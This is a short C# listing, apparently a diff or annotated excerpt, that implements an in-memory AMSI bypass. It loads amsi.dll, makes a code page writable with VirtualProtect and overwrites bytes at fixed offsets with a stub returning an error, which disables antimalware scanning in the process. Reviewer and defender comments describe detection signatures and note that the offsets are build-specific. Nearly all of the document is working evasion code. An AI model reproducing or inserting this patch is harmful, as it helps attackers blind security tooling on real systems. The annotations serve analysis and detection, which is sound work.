- private const string V = "kernel32.dll"; // Library name shared by the two P/Invoke declarations below.
- [DllImport(V)]
- private static extern IntPtr LoadLibrary(string lib); // Win32 LoadLibrary; the caller below uses the returned handle as the module's base address.
- [DllImport(V)]
- private static extern bool VirtualProtect(IntPtr addr, int length, int flprot, out int oldprot); // Win32 VirtualProtect: sets page protection on the range and hands back the previous value in oldprot.
- /// <summary>
- /// Overwrites a few bytes of the amsi.dll image loaded in the current process so that the patched location returns an error HRESULT immediately; original author note: "Bypass AMSI (by gigajew)".
- /// </summary><remarks>Defender view: this is in-process tampering with a security component. It can be caught by monitoring protection changes on amsi.dll code pages and by comparing amsi.dll's in-memory code with the image on disk.</remarks>
- private static void AMSIBypass()
- {
- IntPtr addr = new IntPtr(LoadLibrary("amsi.dll").ToInt64() + ((IntPtr.Size * 8 == 32) ? 0x44A0: 0x23E0)); // Target = amsi.dll handle + fixed offset (0x44A0 with 32-bit pointers, else 0x23E0). NOTE(review): presumably the entry of an AMSI scan export on one specific amsi.dll build; this cannot be verified from the listing. On other builds the write would land on unrelated code. The LoadLibrary result is not checked for zero.
- byte[] buffer = ((IntPtr.Size ==4) ? new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 } : new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 } ); // 32-bit: mov eax, 0x80070057 (E_INVALIDARG); ret 0x18. 64-bit: the same mov followed by ret. These byte sequences serve as a static signature for this stub.
- if (VirtualProtect(addr, buffer.Length, 0x04, out int old)) // 0x04 = PAGE_READWRITE; nothing is written unless the protection change succeeds.
- {
- Marshal.Copy(buffer, 0, addr, buffer.Length); // Overwrites buffer.Length bytes at addr with the stub above.
- VirtualProtect(addr, buffer.Length, old, out old); // Puts the saved protection back; the return value is ignored. The modified bytes stay in place, so an in-memory integrity check still sees them.
- }
- }